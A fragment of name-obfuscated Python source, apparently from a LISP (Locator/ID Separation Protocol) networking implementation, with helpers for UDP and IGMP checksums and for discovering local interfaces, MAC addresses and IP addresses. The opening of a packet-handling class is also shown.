if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
if 10 - 10: Ii1I - i11iIiiIii . I1ii11iIi11i % i1IIi
if 78 - 78: iIii1I11I1II1 * Oo0Ooo . Oo0Ooo - OOooOOo . iIii1I11I1II1
if 30 - 30: ooOoO0o + ooOoO0o % IiII - o0oOOo0O0Ooo - I1ii11iIi11i
if 36 - 36: I11i % OOooOOo
if 72 - 72: I1IiiI / iII111i - O0 + I11i
if 83 - 83: O0
if 89 - 89: Oo0Ooo + I1ii11iIi11i - o0oOOo0O0Ooo
if 40 - 40: OoO0O00 + OoO0O00
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
if 6 - 6: OoOoOO00 / iIii1I11I1II1 * OoooooooOO * i11iIiiIii
if 79 - 79: IiII % OoO0O00
if 81 - 81: i11iIiiIii + i11iIiiIii * OoO0O00 + IiII
if 32 - 32: O0 . OoooooooOO
if 15 - 15: I1IiiI . OoO0O00
if 17 - 17: i11iIiiIii / Oo0Ooo . OoO0O00 / I1IiiI
if 38 - 38: i1IIi . I1ii11iIi11i % Ii1I + iIii1I11I1II1 + O0
if 47 - 47: OoO0O00 + IiII / II111iiii
if 97 - 97: I1ii11iIi11i / I1IiiI % O0 + i1IIi - ooOoO0o
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
def lisp_udp_checksum ( source , dest , data ) :
if 94 - 94: iII111i - Oo0Ooo + oO0o
if 59 - 59: I11i . I1IiiI - iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
I111 = lisp_address ( LISP_AFI_IPV6 , source , LISP_IPV6_HOST_MASK_LEN , 0 )
IiI11I111 = lisp_address ( LISP_AFI_IPV6 , dest , LISP_IPV6_HOST_MASK_LEN , 0 )
Ooo000O00 = socket . htonl ( len ( data ) )
i1iI1Iiii1I = socket . htonl ( LISP_UDP_PROTOCOL )
I1iII = I111 . pack_address ( )
I1iII += IiI11I111 . pack_address ( )
I1iII += struct . pack ( "II" , Ooo000O00 , i1iI1Iiii1I )
if 29 - 29: i1IIi % iII111i / IiII + OoOoOO00 - OOooOOo - I1ii11iIi11i
if 69 - 69: iIii1I11I1II1 . II111iiii . i1IIi - o0oOOo0O0Ooo
if 79 - 79: ooOoO0o % OOooOOo
if 54 - 54: OoOoOO00 - I1Ii111
O0I1II1 = binascii . hexlify ( I1iII + data )
oOOoo = len ( O0I1II1 ) % 4
for iIi1iIIIiIiI in range ( 0 , oOOoo ) : O0I1II1 += "0"
if 9 - 9: I11i . OoO0O00 * i1IIi . OoooooooOO
if 32 - 32: OoOoOO00 . I1ii11iIi11i % I1IiiI - II111iiii
if 11 - 11: O0 + I1IiiI
if 80 - 80: oO0o % oO0o % O0 - i11iIiiIii . iII111i / O0
ii1II1II = 0
for iIi1iIIIiIiI in range ( 0 , len ( O0I1II1 ) , 4 ) :
ii1II1II += int ( O0I1II1 [ iIi1iIIIiIiI : iIi1iIIIiIiI + 4 ] , 16 )
if 13 - 13: I1IiiI + O0 - I1ii11iIi11i % Oo0Ooo / Ii1I . i1IIi
if 60 - 60: Oo0Ooo . IiII % I1IiiI - I1Ii111
if 79 - 79: OoooooooOO / I1ii11iIi11i . O0
if 79 - 79: oO0o - II111iiii
if 43 - 43: i1IIi + O0 % OoO0O00 / Ii1I * I1IiiI
ii1II1II = ( ii1II1II >> 16 ) + ( ii1II1II & 0xffff )
ii1II1II += ii1II1II >> 16
ii1II1II = socket . htons ( ~ ii1II1II & 0xffff )
if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
ii1II1II = struct . pack ( "H" , ii1II1II )
O0I1II1 = data [ 0 : 6 ] + ii1II1II + data [ 8 : : ]
return ( O0I1II1 )
if 12 - 12: I1ii11iIi11i / Ii1I
if 5 - 5: OoooooooOO
if 18 - 18: I1IiiI % OoooooooOO - iII111i . i11iIiiIii * Oo0Ooo % Ii1I
if 12 - 12: i1IIi / OOooOOo % ooOoO0o * IiII * O0 * iIii1I11I1II1
if 93 - 93: Oo0Ooo / I1ii11iIi11i + i1IIi * oO0o . OoooooooOO
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
if 33 - 33: I11i % II111iiii + OoO0O00
def lisp_igmp_checksum ( igmp ) :
Oo = binascii . hexlify ( igmp )
if 21 - 21: I1IiiI + I1ii11iIi11i * Oo0Ooo * iIii1I11I1II1 - OoO0O00 . Oo0Ooo
if 59 - 59: OoO0O00 - OoO0O00 + iII111i
if 32 - 32: i1IIi / Oo0Ooo - O0
if 85 - 85: Ii1I - O0 * i11iIiiIii . i1IIi
ii1II1II = 0
for iIi1iIIIiIiI in range ( 0 , 24 , 4 ) :
ii1II1II += int ( Oo [ iIi1iIIIiIiI : iIi1iIIIiIiI + 4 ] , 16 )
if 20 - 20: iII111i / OOooOOo
if 28 - 28: ooOoO0o * I11i % i11iIiiIii * iII111i / Ii1I
if 41 - 41: OOooOOo - o0oOOo0O0Ooo + Ii1I
if 15 - 15: I11i / o0oOOo0O0Ooo + Ii1I
if 76 - 76: Ii1I + OoooooooOO / OOooOOo % OoO0O00 / I1ii11iIi11i
ii1II1II = ( ii1II1II >> 16 ) + ( ii1II1II & 0xffff )
ii1II1II += ii1II1II >> 16
ii1II1II = socket . htons ( ~ ii1II1II & 0xffff )
if 38 - 38: I1Ii111 . iII111i . I1IiiI * OoO0O00
if 69 - 69: o0oOOo0O0Ooo % i11iIiiIii / Ii1I
if 93 - 93: ooOoO0o
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
ii1II1II = struct . pack ( "H" , ii1II1II )
igmp = igmp [ 0 : 2 ] + ii1II1II + igmp [ 4 : : ]
return ( igmp )
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
def lisp_get_interface_address ( device ) :
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if ( device not in netifaces . interfaces ( ) ) : return ( None )
if 46 - 46: OoOoOO00 - O0
if 70 - 70: I11i + Oo0Ooo * iIii1I11I1II1 . I1IiiI * I11i
if 49 - 49: o0oOOo0O0Ooo
if 25 - 25: iII111i . OoooooooOO * iIii1I11I1II1 . o0oOOo0O0Ooo / O0 + Ii1I
ooo0o0 = netifaces . ifaddresses ( device )
if ( netifaces . AF_INET not in ooo0o0 ) : return ( None )
if 84 - 84: I11i - Oo0Ooo * O0 / Ii1I . Ii1I
if 93 - 93: O0 / ooOoO0o + I1IiiI
if 20 - 20: IiII / iII111i % OoooooooOO / iIii1I11I1II1 + I1IiiI
if 57 - 57: o0oOOo0O0Ooo / I1Ii111
iiIiII = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
if 7 - 7: Oo0Ooo - i1IIi . I1ii11iIi11i / iIii1I11I1II1 * o0oOOo0O0Ooo
for IiI in ooo0o0 [ netifaces . AF_INET ] :
O0O0 = IiI [ "addr" ]
iiIiII . store_address ( O0O0 )
return ( iiIiII )
if 70 - 70: OOooOOo * oO0o / I1IiiI * OoOoOO00 * I1IiiI
return ( None )
if 61 - 61: oO0o + I1ii11iIi11i / i1IIi * oO0o
if 90 - 90: Ii1I % oO0o
if 6 - 6: OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
if 40 - 40: o0oOOo0O0Ooo + I11i
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
def lisp_get_input_interface ( packet ) :
iIIiiIi = lisp_format_packet ( packet [ 0 : 12 ] )
i1I111II = iIIiiIi . replace ( " " , "" )
Oo0OOo = i1I111II [ 0 : 12 ]
i1II11I11ii1 = i1I111II [ 12 : : ]
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
try : I1II1IiI1 = ( i1II11I11ii1 in lisp_mymacs )
except : I1II1IiI1 = False
if 26 - 26: OOooOOo * Oo0Ooo
if ( Oo0OOo in lisp_mymacs ) : return ( lisp_mymacs [ Oo0OOo ] , i1II11I11ii1 , Oo0OOo , I1II1IiI1 )
if ( I1II1IiI1 ) : return ( lisp_mymacs [ i1II11I11ii1 ] , i1II11I11ii1 , Oo0OOo , I1II1IiI1 )
return ( [ "?" ] , i1II11I11ii1 , Oo0OOo , I1II1IiI1 )
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
if 76 - 76: I1ii11iIi11i
def lisp_get_local_interfaces ( ) :
for ooO000OO in netifaces . interfaces ( ) :
i111IIiIiiI1 = lisp_interface ( ooO000OO )
i111IIiIiiI1 . add_interface ( )
if 73 - 73: oO0o . II111iiii * iII111i % oO0o + OoOoOO00 - OoO0O00
return
if 19 - 19: iII111i * Oo0Ooo . iII111i . OoO0O00 / OoO0O00 - oO0o
if 9 - 9: I1Ii111 * IiII * I1Ii111
if 74 - 74: iIii1I11I1II1 / o0oOOo0O0Ooo
if 58 - 58: iIii1I11I1II1 - I1IiiI % o0oOOo0O0Ooo % OoooooooOO * iIii1I11I1II1 + OOooOOo
if 25 - 25: OOooOOo % O0
if 44 - 44: I1Ii111 . Ii1I * II111iiii / IiII + iIii1I11I1II1
if 14 - 14: O0 % IiII % Ii1I * oO0o
def lisp_get_loopback_address ( ) :
for IiI in netifaces . ifaddresses ( "lo" ) [ netifaces . AF_INET ] :
if ( IiI [ "peer" ] == "127.0.0.1" ) : continue
return ( IiI [ "peer" ] )
if 65 - 65: I11i % oO0o + I1ii11iIi11i
return ( None )
if 86 - 86: iIii1I11I1II1 / O0 . I1Ii111 % iIii1I11I1II1 % Oo0Ooo
if 86 - 86: i11iIiiIii - o0oOOo0O0Ooo . ooOoO0o * Oo0Ooo / Ii1I % o0oOOo0O0Ooo
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
def lisp_is_mac_string ( mac_str ) :
iiiI1IiIIii = mac_str . split ( "/" )
if ( len ( iiiI1IiIIii ) == 2 ) : mac_str = iiiI1IiIIii [ 0 ]
return ( len ( mac_str ) == 14 and mac_str . count ( "-" ) == 2 )
if 46 - 46: iIii1I11I1II1
if 70 - 70: i1IIi . I11i
if 74 - 74: I11i
if 58 - 58: iIii1I11I1II1 * OoO0O00 * I1Ii111 * ooOoO0o . OoooooooOO
if 6 - 6: I1ii11iIi11i - oO0o * i11iIiiIii + OoOoOO00 / ooOoO0o % OOooOOo
if 38 - 38: OOooOOo % IiII % II111iiii - Oo0Ooo - iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 28 - 28: OoooooooOO % oO0o + I1ii11iIi11i + O0 . I1Ii111
def lisp_get_local_macs ( ) :
for ooO000OO in netifaces . interfaces ( ) :
if 80 - 80: i11iIiiIii % I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
IiI11I111 = ooO000OO . replace ( ":" , "" )
IiI11I111 = ooO000OO . replace ( "-" , "" )
if ( IiI11I111 . isalnum ( ) == False ) : continue
if 21 - 21: iII111i
if 24 - 24: iII111i / ooOoO0o
if 61 - 61: iIii1I11I1II1 + oO0o
if 8 - 8: I1Ii111 + OoO0O00
if 9 - 9: OOooOOo + o0oOOo0O0Ooo
try :
I1iII1IIi1IiI = netifaces . ifaddresses ( ooO000OO )
except :
continue
if 8 - 8: iIii1I11I1II1
if ( netifaces . AF_LINK not in I1iII1IIi1IiI ) : continue
iiiI1IiIIii = I1iII1IIi1IiI [ netifaces . AF_LINK ] [ 0 ] [ "addr" ]
iiiI1IiIIii = iiiI1IiIIii . replace ( ":" , "" )
if 55 - 55: oO0o
if 37 - 37: IiII / i11iIiiIii / Oo0Ooo
if 97 - 97: I1Ii111 . I11i / I1IiiI
if 83 - 83: I11i - I1ii11iIi11i * oO0o
if 90 - 90: Oo0Ooo * I1IiiI
if ( len ( iiiI1IiIIii ) < 12 ) : continue
if 75 - 75: I1ii11iIi11i - OoOoOO00 * i11iIiiIii . OoooooooOO - Oo0Ooo . I11i
if ( iiiI1IiIIii not in lisp_mymacs ) : lisp_mymacs [ iiiI1IiIIii ] = [ ]
lisp_mymacs [ iiiI1IiIIii ] . append ( ooO000OO )
if 6 - 6: I11i * oO0o / OoooooooOO % Ii1I * o0oOOo0O0Ooo
if 28 - 28: IiII * I1IiiI % IiII
lprint ( "Local MACs are: {}" . format ( lisp_mymacs ) )
return
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
if 97 - 97: o0oOOo0O0Ooo * O0 / o0oOOo0O0Ooo * OoO0O00 * Oo0Ooo
if 38 - 38: I1Ii111
if 25 - 25: iIii1I11I1II1 % II111iiii / I11i / I1ii11iIi11i
def lisp_get_local_rloc ( ) :
iI1iIIIIIiIi1 = getoutput ( "netstat -rn | egrep 'default|0.0.0.0'" )
if ( iI1iIIIIIiIi1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
if 43 - 43: iIii1I11I1II1 % OoO0O00
if 84 - 84: Oo0Ooo
iI1iIIIIIiIi1 = iI1iIIIIIiIi1 . split ( "\n" ) [ 0 ]
ooO000OO = iI1iIIIIIiIi1 . split ( ) [ - 1 ]
if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
IiI = ""
OoO = lisp_is_macos ( )
if ( OoO ) :
iI1iIIIIIiIi1 = getoutput ( "ifconfig {} | egrep 'inet '" . format ( ooO000OO ) )
if ( iI1iIIIIIiIi1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
else :
oO00o00 = 'ip addr show | egrep "inet " | egrep "{}"' . format ( ooO000OO )
iI1iIIIIIiIi1 = getoutput ( oO00o00 )
if ( iI1iIIIIIiIi1 == "" ) :
oO00o00 = 'ip addr show | egrep "inet " | egrep "global lo"'
iI1iIIIIIiIi1 = getoutput ( oO00o00 )
if 51 - 51: Oo0Ooo * iIii1I11I1II1 . OoooooooOO . Ii1I - OOooOOo / I1IiiI
if ( iI1iIIIIIiIi1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
if 98 - 98: II111iiii + Ii1I + OoooooooOO / i1IIi - Ii1I
if 87 - 87: iII111i / I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
if 23 - 23: i11iIiiIii
if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if 65 - 65: II111iiii / Oo0Ooo
if 42 - 42: i11iIiiIii . O0
IiI = ""
iI1iIIIIIiIi1 = iI1iIIIIIiIi1 . split ( "\n" )
if 75 - 75: I1Ii111 + iIii1I11I1II1
for IiiiI1 in iI1iIIIIIiIi1 :
OO0O00o0 = IiiiI1 . split ( ) [ 1 ]
if ( OoO == False ) : OO0O00o0 = OO0O00o0 . split ( "/" ) [ 0 ]
I1IIIi = lisp_address ( LISP_AFI_IPV4 , OO0O00o0 , 32 , 0 )
return ( I1IIIi )
if 39 - 39: I11i . I1ii11iIi11i . OOooOOo * I11i / O0 * o0oOOo0O0Ooo
return ( lisp_address ( LISP_AFI_IPV4 , IiI , 32 , 0 ) )
if 35 - 35: i1IIi * i11iIiiIii % I1ii11iIi11i / IiII / IiII
if 91 - 91: OoO0O00 * I1Ii111 % OoO0O00 . o0oOOo0O0Ooo * I1ii11iIi11i . OOooOOo
if 13 - 13: I1ii11iIi11i
if 80 - 80: Oo0Ooo % IiII % OoooooooOO * Oo0Ooo % Ii1I
if 41 - 41: OoooooooOO / i1IIi
if 70 - 70: OoOoOO00 % o0oOOo0O0Ooo % i1IIi / I1ii11iIi11i % i11iIiiIii / i1IIi
if 4 - 4: IiII
if 93 - 93: oO0o % i1IIi
if 83 - 83: I1IiiI . Oo0Ooo - I11i . o0oOOo0O0Ooo
if 73 - 73: I1IiiI - iII111i . iII111i
if 22 - 22: ooOoO0o / ooOoO0o - Ii1I % I11i . OOooOOo + IiII
def lisp_get_local_addresses ( ) :
global lisp_myrlocs
if 64 - 64: i1IIi % I1ii11iIi11i / Ii1I % OoooooooOO
if 24 - 24: I1Ii111 + OoooooooOO . IiII / OoOoOO00 / I11i
if 65 - 65: OoooooooOO
if 18 - 18: O0 - i1IIi . I1Ii111
if 98 - 98: o0oOOo0O0Ooo
if 73 - 73: Oo0Ooo - iII111i . oO0o % i1IIi . O0
if 15 - 15: ooOoO0o . iIii1I11I1II1 * I1IiiI % I11i
if 21 - 21: OoO0O00 - I1IiiI . OoooooooOO
if 6 - 6: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo / iIii1I11I1II1 * I1Ii111
if 3 - 3: OOooOOo . IiII / Oo0Ooo
OooIIi111 = None
OOOooo0OooOoO = 1
oO0o0o0O = os . getenv ( "LISP_ADDR_SELECT" )
if ( oO0o0o0O != None and oO0o0o0O != "" ) :
oO0o0o0O = oO0o0o0O . split ( ":" )
if ( len ( oO0o0o0O ) == 2 ) :
OooIIi111 = oO0o0o0O [ 0 ]
OOOooo0OooOoO = oO0o0o0O [ 1 ]
else :
if ( oO0o0o0O [ 0 ] . isdigit ( ) ) :
OOOooo0OooOoO = oO0o0o0O [ 0 ]
else :
OooIIi111 = oO0o0o0O [ 0 ]
if 11 - 11: I1Ii111 - I11i % i11iIiiIii . iIii1I11I1II1 * I1IiiI - Oo0Ooo
if 73 - 73: O0 + ooOoO0o - O0 / OoooooooOO * Oo0Ooo
OOOooo0OooOoO = 1 if ( OOOooo0OooOoO == "" ) else int ( OOOooo0OooOoO )
if 32 - 32: OoO0O00 % I1IiiI % iII111i
if 66 - 66: OoOoOO00 + o0oOOo0O0Ooo
OOOO00 = [ None , None , None ]
o0 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
I1iI111ii111i = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
o00 = None
if 38 - 38: ooOoO0o
for ooO000OO in netifaces . interfaces ( ) :
if ( OooIIi111 != None and OooIIi111 != ooO000OO ) : continue
ooo0o0 = netifaces . ifaddresses ( ooO000OO )
if ( ooo0o0 == { } ) : continue
if 38 - 38: O0 - IiII * Oo0Ooo . O0 . I1ii11iIi11i
if 82 - 82: OoooooooOO
if 75 - 75: II111iiii % I1IiiI + OOooOOo % OoooooooOO / IiII
if 4 - 4: i11iIiiIii - OOooOOo % I1ii11iIi11i * I1Ii111 % o0oOOo0O0Ooo
o00 = lisp_get_interface_instance_id ( ooO000OO , None )
if 71 - 71: ooOoO0o . ooOoO0o - iIii1I11I1II1
if 22 - 22: OoooooooOO / I1ii11iIi11i % iII111i * OoOoOO00
if 32 - 32: OoooooooOO % oO0o % iIii1I11I1II1 / O0
if 61 - 61: II111iiii . O0 - Ii1I - I1ii11iIi11i / i11iIiiIii - II111iiii
if ( netifaces . AF_INET in ooo0o0 ) :
Oo00O0OO = ooo0o0 [ netifaces . AF_INET ]
O0oo0oOo = 0
for IiI in Oo00O0OO :
o0 . store_address ( IiI [ "addr" ] )
if ( o0 . is_ipv4_loopback ( ) ) : continue
if ( o0 . is_ipv4_link_local ( ) ) : continue
if ( o0 . address == 0 ) : continue
O0oo0oOo += 1
o0 . instance_id = o00
if ( OooIIi111 == None and
lisp_db_for_lookups . lookup_cache ( o0 , False ) ) : continue
OOOO00 [ 0 ] = o0
if ( O0oo0oOo == OOOooo0OooOoO ) : break
if 40 - 40: I11i % ooOoO0o
if 71 - 71: OoO0O00
if ( netifaces . AF_INET6 in ooo0o0 ) :
oOOOoo0o = ooo0o0 [ netifaces . AF_INET6 ]
O0oo0oOo = 0
for IiI in oOOOoo0o :
O0O0 = IiI [ "addr" ]
I1iI111ii111i . store_address ( O0O0 )
if ( I1iI111ii111i . is_ipv6_string_link_local ( O0O0 ) ) : continue
if ( I1iI111ii111i . is_ipv6_loopback ( ) ) : continue
O0oo0oOo += 1
I1iI111ii111i . instance_id = o00
if ( OooIIi111 == None and
lisp_db_for_lookups . lookup_cache ( I1iI111ii111i , False ) ) : continue
OOOO00 [ 1 ] = I1iI111ii111i
if ( O0oo0oOo == OOOooo0OooOoO ) : break
if 75 - 75: iII111i
if 16 - 16: I1ii11iIi11i + II111iiii * OoOoOO00 . IiII
if 10 - 10: iII111i * Ii1I - ooOoO0o . I11i - OOooOOo
if 94 - 94: I1IiiI % IiII + OoO0O00
if 90 - 90: i1IIi + O0 - oO0o . iII111i + iIii1I11I1II1
if 88 - 88: Ii1I * O0 . I1Ii111 / OoooooooOO
if ( OOOO00 [ 0 ] == None ) : continue
if 29 - 29: OoooooooOO . II111iiii % OoOoOO00
OOOO00 [ 2 ] = ooO000OO
break
if 26 - 26: iIii1I11I1II1 - I1ii11iIi11i . IiII . IiII + iIii1I11I1II1 * Oo0Ooo
if 85 - 85: OOooOOo + II111iiii - OOooOOo * oO0o - i1IIi % iII111i
IiIiI = OOOO00 [ 0 ] . print_address_no_iid ( ) if OOOO00 [ 0 ] else "none"
iI1Ii11 = OOOO00 [ 1 ] . print_address_no_iid ( ) if OOOO00 [ 1 ] else "none"
ooO000OO = OOOO00 [ 2 ] if OOOO00 [ 2 ] else "none"
if 93 - 93: I1IiiI / ooOoO0o / I11i + II111iiii + i11iIiiIii
OooIIi111 = " (user selected)" if OooIIi111 != None else ""
if 16 - 16: I1IiiI - oO0o . Oo0Ooo
IiIiI = red ( IiIiI , False )
iI1Ii11 = red ( iI1Ii11 , False )
ooO000OO = bold ( ooO000OO , False )
lprint ( "Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}" . format ( IiIiI , iI1Ii11 , ooO000OO , OooIIi111 , o00 ) )
if 94 - 94: OoOoOO00 + IiII . ooOoO0o
if 69 - 69: O0 - O0
lisp_myrlocs = OOOO00
return ( ( OOOO00 [ 0 ] != None ) )
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
if 35 - 35: I1IiiI . OoOoOO00 + OoooooooOO % Oo0Ooo % OOooOOo
if 39 - 39: Ii1I
if 60 - 60: OOooOOo
if 62 - 62: I1Ii111 * I11i
if 74 - 74: OoOoOO00 . iIii1I11I1II1
if 87 - 87: ooOoO0o
if 41 - 41: OoOoOO00 . iIii1I11I1II1 % ooOoO0o + O0
def lisp_get_all_addresses ( ) :
IIiII11 = [ ]
for i111IIiIiiI1 in netifaces . interfaces ( ) :
try : oo0O00OOOOO = netifaces . ifaddresses ( i111IIiIiiI1 )
except : continue
if 53 - 53: OoooooooOO . OoooooooOO + o0oOOo0O0Ooo - iII111i + OOooOOo
if ( netifaces . AF_INET in oo0O00OOOOO ) :
for IiI in oo0O00OOOOO [ netifaces . AF_INET ] :
OO0O00o0 = IiI [ "addr" ]
if ( OO0O00o0 . find ( "127.0.0.1" ) != - 1 ) : continue
IIiII11 . append ( OO0O00o0 )
if 44 - 44: I1Ii111 - IiII
if 100 - 100: oO0o . OoO0O00 - Ii1I + O0 * OoO0O00
if ( netifaces . AF_INET6 in oo0O00OOOOO ) :
for IiI in oo0O00OOOOO [ netifaces . AF_INET6 ] :
OO0O00o0 = IiI [ "addr" ]
if ( OO0O00o0 == "::1" ) : continue
if ( OO0O00o0 [ 0 : 5 ] == "fe80:" ) : continue
IIiII11 . append ( OO0O00o0 )
if 59 - 59: II111iiii
if 43 - 43: Oo0Ooo + OoooooooOO
if 47 - 47: ooOoO0o
return ( IIiII11 )
if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
if 23 - 23: II111iiii * iII111i
if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
if 21 - 21: OoO0O00
if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
def lisp_get_all_multicast_rles ( ) :
Ii1iIi = [ ]
iI1iIIIIIiIi1 = getoutput ( 'egrep "rle-address =" ./lisp.config' )
if ( iI1iIIIIIiIi1 == "" ) : return ( Ii1iIi )
if 79 - 79: OOooOOo % I1Ii111 / oO0o - iIii1I11I1II1 - OoOoOO00
o0oOO = iI1iIIIIIiIi1 . split ( "\n" )
for IiiiI1 in o0oOO :
if ( IiiiI1 [ 0 ] == "#" ) : continue
ooo0o0O = IiiiI1 . split ( "rle-address = " ) [ 1 ]
IiiiIIi11II = int ( ooo0o0O . split ( "." ) [ 0 ] )
if ( IiiiIIi11II >= 224 and IiiiIIi11II < 240 ) : Ii1iIi . append ( ooo0o0O )
if 55 - 55: I11i
return ( Ii1iIi )
if 93 - 93: i11iIiiIii . o0oOOo0O0Ooo
if 16 - 16: i1IIi . i1IIi / I1Ii111 % OoOoOO00 / I1IiiI * I1ii11iIi11i
if 30 - 30: o0oOOo0O0Ooo + OoooooooOO + OOooOOo / II111iiii * Oo0Ooo
if 59 - 59: Ii1I / OoOoOO00 * OoO0O00 * iII111i % oO0o
if 61 - 61: Oo0Ooo - O0 - OoooooooOO
if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
if 18 - 18: Oo0Ooo % O0
if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
class lisp_packet ( object ) :
def __init__ ( self , packet ) :
self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_tos = 0
self . outer_ttl = 0
self . udp_sport = 0
self . udp_dport = 0
self . udp_length = 0
self . udp_checksum = 0
self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_sport = 0
self . inner_dport = 0
self . lisp_header = lisp_data_header ( )
self . packet = packet
self . inner_version = 0
self . outer_version = 0
self . encap_port = LISP_DATA_PORT
self . inner_is_fragment = False
self . packet_error = ""
self . gleaned_dest = False
if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
if 86 - 86: IiII
def encode ( self , nonce ) :
